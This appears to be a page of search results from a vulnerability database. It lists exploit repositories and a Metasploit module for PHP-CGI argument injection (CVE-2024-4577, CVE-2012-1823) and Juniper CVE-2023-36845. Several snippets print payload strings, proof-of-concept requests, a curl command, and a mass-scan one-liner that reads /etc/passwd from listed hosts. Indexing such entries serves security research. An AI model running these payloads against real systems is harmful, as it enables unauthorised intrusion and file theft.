Lucene search
+L

14 matches found

Kitploit
Kitploit
added 2026/09/22 9:09 a.m.12 views

PHP_CVE-2012-1823

PHP-CGI Remote Code Execution Vulnerability CVE-2012-1823 Principle Reference article http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/ Affected versions: php...

9.8CVSS8.4AI score0.99998EPSS
SaveExploits46
Kitploit
Kitploit
added 2026/09/22 4:59 a.m.8 views

MassExploit-CVE-2024-4577

CVE-2024-4577 Mass Scanner & Exploit Tool This Python script automates the detection of servers vulnerable to CVE-2024-4577 , a critical vulnerability in PHP-CGI that allows remote code execution RCE through specially crafted query parameters. The tool sends a PHP payload using...

9.8CVSS7.9AI score0.99987EPSS
SaveExploits68
Kitploit
Kitploit
added 2026/09/22 1:14 a.m.13 views

CVE-2023-36845

CVE-2023-36845 Description CVE-2023-36845 represents a notable PHP environment variable manipulation vulnerability that impacts Juniper SRX firewalls and EX switches. While Juniper has categorized this vulnerability as being of medium severity, in this article, we will elucidate how this singular...

9.8CVSS7.9AI score0.9507EPSS
SaveExploits24
Kitploit
Kitploit
added 2026/09/21 11:27 p.m.7 views

CVE-2024-4577-Nuclei-Template

CVE-2024-4577 Nuclei Template This repository contains a Nuclei template to detect the PHP CGI Argument Injection vulnerability identified as CVE-2024-4577. Template Details root@kitploit: id: CVE-2024-4577 info: name: CVE-2024-4577 PHP CGI Argument Injection author: Hüseyin TINTAŞ severity:...

9.8CVSS7.8AI score0.99987EPSS
SaveExploits68
Kitploit
Kitploit
added 2026/09/21 2:18 p.m.7 views

CVE-2024-4577-nuclei

CVE-2024-4577-nuclei Payload: root@kitploit: ?%ADd+allowurlinclude%3d1+%ADd+autoprependfile%3dphp://input root@kitploit: Test URL: root@kitploit: /unfxu9a.phppayload /php-cgi/unfxu9a.phppayload /cgi-bin/php-cgi.exepayload /php-cgi/php-cgi.exepayload /php-cgi/php.exepayload /cgi-bin/php.exepayload...

9.8CVSS7.8AI score0.99987EPSS
SaveExploits68
Kitploit
Kitploit
added 2026/09/21 1:49 p.m.9 views

CVE-2024-4577

CVE-2024-4577, Argument Injection in PHP-CGI root@kitploit: ./CVE-2024-4577.sh /path/to/domains-list POC : root@kitploit: POST /test.hello?%ADd+allowurlinclude%3d1+%ADd+autoprependfile%3dphp://input HTTP/1.1 Host: host User-Agent: curl/8.3.0 Accept: / Content-Length: 23 Content-Type:...

9.8CVSS7.8AI score0.99987EPSS
SaveExploits68
Kitploit
Kitploit
added 2026/09/20 4:00 p.m.10 views

CVE-2024-4577

CVE-2024-4577 Environment Setup Files and PHP Files --poc-- Invoke-WebRequest -Method POST -Headers @"Content-Type" = "application/x-www-form-urlencoded" -Body "" -Uri "http://localhost/test.php?%ADd+allowurlinclude%3D1+%ADd+autoprepend file%3Dphp://input"...

9.8CVSS7.5AI score0.99987EPSS
SaveExploits68
Kitploit
Kitploit
added 2026/09/20 3:46 p.m.11 views

CVE-2024-4577

CVE-2024-4577 Vulnerability Checker This script is designed to check for the vulnerability described by CVE-2024-4577, which involves exploiting certain PHP configurations to execute arbitrary code remotely. It sends a POST request to specified endpoints on a list of domains and checks if the...

9.8CVSS8.4AI score0.99987EPSS
SaveExploits68
Kitploit
Kitploit
added 2026/09/20 3:03 p.m.14 views

CVE-2024-4577

Just for researching Poc For Default XAMPP root@kitploit: curl -v -d "" http://127.0.0.1/php-cgi/php-cgi.exe/?%add+allowurlinclude%3Don+-d+autoprependfile%3Dphp%3A//input+-d+cgi.forceredirect%3D0...

9.8CVSS7.8AI score0.99987EPSS
SaveExploits68
Kitploit
Kitploit
added 2026/09/18 5:26 p.m.10 views

Juniper-exploit-CVE-2023-36845

CVE-2023-36845 Description CVE-2023-36845 represents a notable PHP environment variable manipulation vulnerability that impacts Juniper SRX firewalls and EX switches. While Juniper has categorized this vulnerability as being of medium severity, in this article, we will elucidate how this singular...

9.8CVSS7.9AI score0.9507EPSS
SaveExploits24
Kitploit
Kitploit
added 2026/09/17 1:52 a.m.23 views

cve-2024-4577-lab

CVE-2024-4577 — PHP-CGI Argument Injection → RCE Docker Lab / CTF A self-contained, from-scratch Docker lab that demonstrates the real argument-injection → Remote Code Execution primitive behind CVE-2024-4577. Exploit it over http://localhost:8080, pop a shell, and read the flag from inside the...

9.8CVSS7.7AI score0.99987EPSS
SaveExploits68
Kitploit
Kitploit
added 2026/09/16 5:57 a.m.8 views

CVE-2023-36845

CVE-2023-36845 Mass check One liner CVE-2023-36845 cat ip.txt| while read host do;do curl -sk "http://$host/?PHPRC=/dev/fd/0" -X POST -d 'autoprependfile="/etc/passwd"'| grep -i 'root:' && echo $host "is VULNERABLE";done...

9.8CVSS7.9AI score0.9507EPSS
SaveExploits24
Kitploit
Kitploit
added 2026/09/16 12:51 a.m.11 views

CVE-2024-4577_PowerShell

CVE-2024-4577PowerShell Please note: Ensure that you are authorized to conduct such penetration testing in the target environment; unauthorized use of attack techniques may violate relevant laws. The code is for educational and research purposes only, and should be used within legal and ethical...

9.8CVSS7.7AI score0.99987EPSS
SaveExploits68
zdt
zdt
added 2023/10/02 12:00 a.m.459 views

Juniper SRX Firewall / EX Switch Remote Code Execution Exploit

This Metasploit module exploits a PHP environment variable manipulation vulnerability affecting Juniper SRX firewalls and EX switches. The affected Juniper devices running FreeBSD and every FreeBSD process can access their stdin by opening /dev/fd/0. The exploit also makes use of two useful PHP...

9.8CVSS6.2AI score0.9507EPSS
SaveExploits26
Rows per page
Query Builder